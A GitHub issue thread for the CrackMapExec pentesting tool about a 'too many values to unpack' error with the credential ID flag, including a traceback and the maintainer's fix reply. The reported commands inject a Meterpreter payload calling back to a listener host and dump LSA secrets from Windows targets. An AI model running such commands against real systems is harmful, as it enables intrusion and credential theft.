### ISSUE TITLE
ValueError when using ID flag

### ISSUE THREAD

**Issue by redteamwynns** [byt3bl33d3r/CrackMapExec#151]
## Steps to reproduce
Use id flag, sprinkle smidge

## Command string used
cme 172.16.127.9 -id 24 -M metinject -o LHOST=172.16.127.251 LPORT=4443 --server-port=8443

## CME verbose output (using the --verbose flag)
```
DEBUG                                          {'domain': None, 'wdigest': None, 'verbose': True, 'sam': False, 'cred_id': ['24'], 'module_options': ['LHOST=172.16.127.251', 'LPORT=4443'], 'fail_limit': None, 'share': 'C$', 'lusers': False, 'module': 'metinject', 'smb_port': 445, 'show_options': False, 'rid_brute': None, 'uac': False, 'ufail_limit': None, 'pass_pol': False, 'regex': None, 'list_modules': False, 'no_output': False, 'pattern': None, 'lsa': False, 'force_ps32': False, 'shares': False, 'content': False, 'server_host': '0.0.0.0', 'wmi': None, 'exclude_dirs': '', 'server_port': 8443, 'wmi_namespace': '//./root/cimv2', 'gfail_limit': None, 'mssql_query': None, 'username': [], 'hash': [], 'users': False, 'sessions': False, 'exec_method': None, 'spider': None, 'ps_execute': None, 'threads': 100, 'mssql_port': 1433, 'password': [], 'mssql': False, 'mssql_auth': 'windows', 'ntds_pwdLastSet': False, 'execute': None, 'target': ['172.16.127.9'], 'ntds_history': False, 'disks': False, 'ntds': None, 'server': 'https', 'depth': 10, 'local_auth': False, 'timeout': 20}
DEBUG                                          CME server type: https
CME          172.16.127.9:445 AUTHSRVR        [*] Windows 6.1 Build 7601 (name:AUTHSRVR) (domain:DRAAS)
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/gevent/greenlet.py", line 536, in run
    result = self._run(*self.args, **self.kwargs)
  File "/usr/local/lib/python2.7/dist-packages/cme/connection.py", line 146, in __init__
    self.login()
  File "/usr/local/lib/python2.7/dist-packages/cme/connection.py", line 345, in login
    c_id, credtype, domain, username, password = self.db.get_credentials(filterTerm=cred_id)[0]
ValueError: too many values to unpack
Tue Jan 24 10:06:05 2017 <Greenlet at 0x7f33b8355e10: Connection(Namespace(content=False, cred_id=['24'], depth=10,, <cme.database.CMEDatabase instance at 0x7f33b9380f, '172.16.127.9', <payload_module.CMEModule instance at 0x7f33b93871, <CMEServer(Thread-1, started 139860121805040)>)> failed with ValueError
```

## OS
Arch

## Target OS
Windows 6.1 Build 7601

## Detailed issue explanation
"Too many values to unpack" when using the id flag

**Comment by byt3bl33d3r** [comment]
> Use id flag, sprinkle smidge
I aproove of this message

**Comment by byt3bl33d3r** [comment]
@redteamwynns Should be fixed now. Will push up a bug fix release once I get home.

**Comment by lan1ak3a-2** [comment]
Hello, I am getting this same error.
OS = High Sierra 10.13.3 (17D47)
cme smb 10.203.1.148 -id 432 --lsa
password = self.db.get_credentials(filterTerm=cred_id)[0]
ValueError: too many values to unpack
